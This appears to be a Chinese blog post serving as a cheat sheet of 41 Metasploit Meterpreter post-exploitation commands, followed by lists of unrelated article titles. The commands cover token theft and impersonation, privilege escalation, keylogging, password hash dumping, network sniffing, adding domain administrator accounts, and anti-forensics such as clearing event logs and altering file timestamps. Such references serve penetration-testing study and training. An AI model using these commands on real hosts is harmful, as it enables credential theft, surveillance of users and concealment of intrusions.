meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。

常见的meterpreter命令

  1.  run scriptname       运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
  2. sysinfo                    列出受控主机的系统信息。
  3.   ls                             列出目标主机的文件和文件夹信息。
  4. use priv                    加载特权提升扩展模块,来扩展Meterpreter库。
  5. ps                            显示所有运行进程以及关联的用户账号。
  6. migrate PID               迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
  7. use incognito             加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
  8. list_tokens -u            列出目标主机用户的可用令牌。
  9. list_tokens -g            列出目标主机用户组的可用令牌。
  10. impersonate_token DOMAIN_NAME\\USERNAME             假冒目标主机上的可用令牌。
  11. steal_token PID          盗窃给定进程的可用令牌并进行令牌假冒。
  12. drop_token                停止假冒当前令牌。
  13. getsystem                  通过各种攻击向量来提升系统用户权限。
  14. shell                          以所有可用令牌来运行一个交互的shell。
  15. execute -f cmd.exe -i  执行cmd.exe命令并进行交互。
  16. execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
  17. execute -f cmd.exe -i -H -t  以所有可用的令牌来执行cmd命令并隐藏该进程。
  18. rev2self                      回到控制目标主机的初始化用户账号下。
  19. reg command              在目标主机注册表中进行交互,创建,删除,查询等操作。
  20. setdesktop number      切换到另一个用户界面(该功能基于哪些用户已登录)。
  21. screenshot                  对目标主机的屏幕进行截图。
  22. upload file                   向目标主机上传文件
  23. download file               从目标主机下载文件。
  24. keyscan_start             针对远程目标主机开启键盘记录功能。
  25. keyscan_dump            存储目标主机上捕获的键盘记录。
  26. keyscan_stop              停止针对目标主机的键盘记录功能。
  27. getprivs                      尽可能多的获取目标主机上的特权。
  28. uictl enable keyboard/mouse     接管目标主机的键盘和鼠标。
  29. background                 将你当前的Meterpreter shell转为后台执行。
  30. hashdump                   导出目标主机中的口令哈希值。
  31. use sniffer                   加载嗅探模块。
  32. sniffer_interfaces          列出目标主机所有开放的网络接口。
  33. sniffer_dump interfaceID pcapname        在目标主机上启动嗅探。
  34. sniffer_stats interfaceID  获取正在实施嗅探网络接口的统计数据。
  35. sniffer_start interfaceID packet-buffer  在目标主机上针对特定范围的数据包缓冲区启动嗅探。
  36. sniffer_stop interfaceID 停止嗅探。
  37. add_user username password -h ip   在远程目标主机上添加一个用户。
  38. add_group_user "Domain Admins" username -h ip     将用户添加到目标主机的域管理员组中。
  39. clearev                        清除目标主机上的日志记录。
  40. timestomp                   修改文件属性,例如修改文件的创建时间(反取证调查)。
  41. reboot                         重启目标主机。

最新文章

  1. 51nod 1613翻硬币
  2. Cocos2dx Widget button透明区域过滤
  3. linux学习笔记之零散笔记。
  4. sql标识符和格式
  5. swift UILable的用法
  6. 跨域 Ajax 其他可选技术 异步
  7. 编译虚拟机jvm——openjdk的编译
  8. terraform基本使用
  9. Djagno从入门到放弃
  10. 为了下载和使用最新的git,只好安装了迅雷
  11. hibernate状态转换关系图【原】
  12. Swift5 语言指南(十三) 方法
  13. C语言常用修饰符
  14. Permutation Sequence leetcode java
  15. ASP.NET MVC 5 开发环境配置
  16. boost::asio::io_service类
  17. bag of words
  18. .net core 中 identity server 4 之术语
  19. calibre,完成对各种格式的电子书籍的管理和格式转换及同步
  20. C# 矩阵乘法实现

热门文章

  1. Django model 表与表的关系
  2. BZOJ1563 NOI2009诗人小G(动态规划+决策单调性)
  3. JavaScript无法运行问题
  4. python 随机数模块 -- random
  5. [luogu3178][bzoj4034][HAOI2015]树上操作
  6. 洛谷 P3313 [SDOI2014]旅行 解题报告
  7. Jenkins中使用Azure Powershell连接Service Fabric报错not recognized的原因与解决办法
  8. C# 面向对象零碎知识点
  9. A1084. Broken Keyboard
  10. 【CH1602】最大异或和 trie+贪心